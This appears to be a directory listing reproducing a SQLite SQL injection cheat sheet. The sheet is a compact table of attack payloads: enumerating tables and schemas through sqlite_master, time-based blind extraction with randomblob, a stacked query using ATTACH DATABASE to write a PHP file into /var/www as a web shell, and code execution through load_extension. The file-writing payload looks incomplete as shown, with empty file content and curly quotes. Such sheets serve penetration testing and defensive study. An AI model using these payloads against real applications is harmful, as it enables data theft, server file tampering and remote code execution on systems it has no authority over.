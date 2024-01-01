SQLite SQL Injection Cheat Sheet 0 ( 0 ) Report Issue Reason Select a reason Deprecated Incorrect information Claim this listing Other Details Close Submit Visit Website

If you need You use Concatenation || Comments -- Conditionals CASE WHEN key='value1' THEN 'something' WHEN key='value2' THEN 'somethingelse' Substring substr(string,start,stop) Length length(string) Quotes without literal quotes cast(X'27' as text) --use X'22' for double quotes Table name enumeration SELECT name FROM sqlite_master WHERE type='table' Table schema enumeration SELECT sql FROM sqlite_master WHERE type='table' Time-based data extraction cond='true' AND 1=randomblob(100000000) --causes time delay if cond='true' File writing 1';ATTACH DATABASE ‘/var/www/lol.php’ AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (‘’;-- --requires either direct database access or (non-default) stacked query option enabled Arbitrary Code Execution load_extension(library_file,entry_point) -- .dll for Windows, .so for 'nix. Requires non-default configuration